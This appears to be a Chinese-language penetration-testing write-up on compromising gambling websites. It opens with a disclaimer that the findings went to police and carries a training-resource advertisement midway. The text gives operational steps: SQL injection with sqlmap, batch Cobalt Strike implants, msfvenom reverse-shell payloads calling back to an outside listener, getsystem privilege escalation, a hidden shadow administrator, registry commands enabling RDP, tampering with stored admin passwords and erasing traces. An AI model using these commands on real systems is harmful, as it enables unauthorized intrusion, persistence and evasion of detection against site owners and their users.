声明

此渗透测试后已将所有信息移交警方，请勿用于非法用途。

信息搜集

首先当然是通过fofa进行 bc 网站的后台搜集（搜索语法大家自行探索），获得的 qi 牌 bc 站几乎都是一模一样，估计是分站。随便打开一个看看，是下图

sqlmap 跑一把，发现存在堆叠注入。由于都是分站，因此存在相同漏洞的应该不少。

【一一帮助安全学习，所有资源获取处一一】

①网络安全学习路线

②20 份渗透测试电子书

③安全攻防 357 页笔记

④50 份安全攻防面试指南

⑤安全红队渗透工具包

⑥网络安全必备书籍

⑦100 个漏洞实战案例

⑧安全大厂内部视频资源

⑨历年 CTF 夺旗赛题解析

上线 cs

写个脚本，批量上线 cs。可以看到有个上线就直接是 SYSTEM 权限，这就很无聊了。我们拿个普通权限的进行进一步渗透测试

首先我们要提权，至少也得有 Administrator 权限吧。

提权

方式一（漏洞利用）

cs 中执行run systeminfo收集目标安装的补丁，使用在线提权辅助工具查看能够利用的漏洞。查找 exp 并利用即可。

方式二（msf 辅助提权）

要想利用 msf 辅助提权，必须要反弹 shell 到 msf

一方面可以利用 cs 在目标机上执行 msf 生成的木马上线 msf。我这里是 cs 服务端和 msf 在同一 vps 上

msfvenom -p windows/meterpreter_reverse_tcp lhost=x.x.x.x lport=8888 -f exe > shell.exemsfconsoleuse exploit/multi/handlerset payload windows/meterpreter_reverse_tcpshow optionsset lhost x.x.x.xset lport 8888run

将shell.exe上传至目标并执行，即可看到 msf 已上线

或者直接通过 cs 进行会话派生 spawn

cs 上创建监听器

msf 进行配置，注意这里两个 payload 要相互对应

use exploit/multi/handlerset payload windows/meterpreter/reverse_httpset lhost x.x.x.xset lport 8888exploit

在 msf 中getuid查看到当前用户为mssqlsserver，利用 msf 自带的提权getsystem，居然直接就提权成功，拿到了 system 权限。

然后再利用 system 权限执行 cs 生成的 shell，上线之后就是 system 权限了

当然我们获得 system 权限后可以注入进程，更安全一些

现在既然已经拿到了最高权限，那就可以为所欲为了。

后渗透

强烈建议创建一个影子管理员用户，请自行百度。

开启 RDP

nmap 扫一下发现 3389 端口未开

查看是否开启 rdp

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

如未打开，使用下列命令打开

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看 rdp 端口

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

这个管理员还是有点安全意识的，把 RDP 端口改成了 39982

我们利用之前创建的影子用户进行 RDP 连接，直接就进到了桌面。可以看到这就是个“正儿八经“的 bc 网站

数据库

将 mssql 设置为 windows 登录验证，用影子用户连上他们的数据库看看

在一个数据表中找到后台登录的用户密码，很幸运密码直接就能用 cmd5 爆破出来。当然爆破不出来也没事，直接把我们自己的密码 md5 后直接修改数据表。

登进后台

横向移动

这就是个小型的分站，并没有加入域，单个的工作组，也就没有进行下去的必要了

打扫战场

没有做持久化的必要了，走之前打扫一下战场

总结

整个渗透过程（尤其是提权过程）都异常的顺利，虽然通过辅助平台查询后发现有多个漏洞可以利用，但没想到 msf 的 getsystem 直接就拿下了最高权限。